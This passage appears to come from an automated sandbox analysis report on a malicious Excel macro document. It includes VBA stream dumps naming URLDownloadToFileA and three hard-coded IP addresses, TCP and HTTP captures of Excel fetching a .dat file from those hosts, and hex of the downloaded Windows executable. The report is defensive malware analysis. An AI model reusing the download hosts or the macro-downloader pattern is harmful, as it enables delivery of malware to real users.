      Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
      Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
      Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 226
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/f
      File Type:data
      Stream Size:226
      Entropy:3.01175231218
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 ) . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . . . . . . . . .
      Data Raw:00 04 20 00 08 0c 00 0c 0a 00 00 00 10 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 b4 00 00 00 00 84 01 6c 00 00 28 00 f5 01 00 00 06 00 00 80 07 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 29 00 d4 00 00 00 d4 00 00 00 00 00 28 00 f5 01 00 00 06 00 00 80 08 00 00 00 32 00 00 00 38 00 00 00 01 00 15 00 4c 61 62 65 6c 32
      Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 272
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/o
      File Type:data
      Stream Size:272
      Entropy:3.6318384866
      Base64 Encoded:True
      Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 8 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 1 8 3 . 9 6 . 6 7 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 2 5 0 . 1 4 8 . 2 1 3 / . . . . . . . . . . . . . 5 . . . . . . .
      Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 37 38 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4332
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      File Type:data
      Stream Size:4332
      Entropy:4.42025024054
      Base64 Encoded:False
      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
      Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2461
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
      File Type:data
      Stream Size:2461
      Entropy:3.4974013905
      Base64 Encoded:False
      Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . 3 . . d . A
      Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 03 00 00 00 00 00 01 00 02 00 03 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
      File Type:data
      Stream Size:138
      Entropy:1.48462480805
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 6a 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
      File Type:data
      Stream Size:264
      Entropy:1.9985725068
      Base64 Encoded:False
      Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . N . . . . . . .
      Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
      File Type:data
      Stream Size:256
      Entropy:1.80540314317
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1047
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/dir
      File Type:data
      Stream Size:1047
      Entropy:6.66117755603
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . . . H c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
      Data Raw:01 13 b4 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 cc 07 a0 48 63 06 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Sep 27, 2021 18:02:55.662444115 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:55.832690954 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:55.832881927 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:55.833929062 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:56.003535986 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:56.845748901 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:56.845774889 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:56.845788956 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:56.845851898 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:56.845897913 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:56.845963001 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:56.845976114 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:56.845990896 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:56.846005917 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:56.846016884 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:56.846035957 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:56.846075058 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:56.846096039 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:56.846183062 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:56.900895119 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.016239882 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.016330957 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.016597986 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.016777039 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.016844988 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.017389059 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.017476082 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.018258095 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.018326044 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.018330097 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.018348932 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.018371105 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.018383980 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.018392086 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.018414974 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.018414974 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.018439054 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.018479109 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.018490076 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.018496990 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.018500090 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.018518925 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.018529892 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.018537998 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.018553019 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.018556118 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.018578053 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.018601894 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.019433975 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.052937031 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.052974939 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.053000927 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.053028107 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.053132057 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.055196047 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.186556101 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.186588049 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.186609983 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.186630964 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.186671019 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.186728001 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.186764002 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.186801910 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.188623905 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.188652039 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.188700914 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.188724995 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.188755989 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.258841991 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.258873940 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.258892059 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.258913040 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.258936882 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.258960962 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.258981943 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.259004116 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.259025097 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.259047031 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.259063959 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.259084940 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.259111881 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.259145975 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.259166002 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.259182930 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.259187937 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.259187937 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.259208918 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.259212017 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.259228945 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.259248972 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.259252071 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.259272099 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.259274960 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.259299040 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.259308100 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.259322882 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.259334087 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.259345055 CEST8049167190.14.37.178192.168.2.22
      Sep 27, 2021 18:02:57.259365082 CEST4916780192.168.2.22190.14.37.178
      Sep 27, 2021 18:02:57.259366035 CEST8049167190.14.37.178192.168.2.22

      HTTP Request Dependency Graph

      • 190.14.37.178
      • 185.183.96.67
      • 185.250.148.213

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.2249167190.14.37.17880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Sep 27, 2021 18:02:55.833929062 CEST0OUTGET /44466.7516903935.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 190.14.37.178
      Connection: Keep-Alive
      Sep 27, 2021 18:02:56.845748901 CEST1INHTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 16:02:56 GMT
      Content-Type: application/octet-stream
      Content-Length: 387072
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.7516903935.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;a! p| .text `.edatap @@.data 0@.dataTP$@.rdatatH@.rsrc @@P0PPPHPP


      Session IDSource IPSource PortDestination IPDestination PortProcess
      1192.168.2.2249168185.183.96.6780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Sep 27, 2021 18:02:59.632400036 CEST405OUTGET /44466.7516903935.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 185.183.96.67
      Connection: Keep-Alive
      Sep 27, 2021 18:02:59.857233047 CEST407INHTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 16:02:59 GMT
      Content-Type: application/octet-stream
      Content-Length: 387072
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.7516903935.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 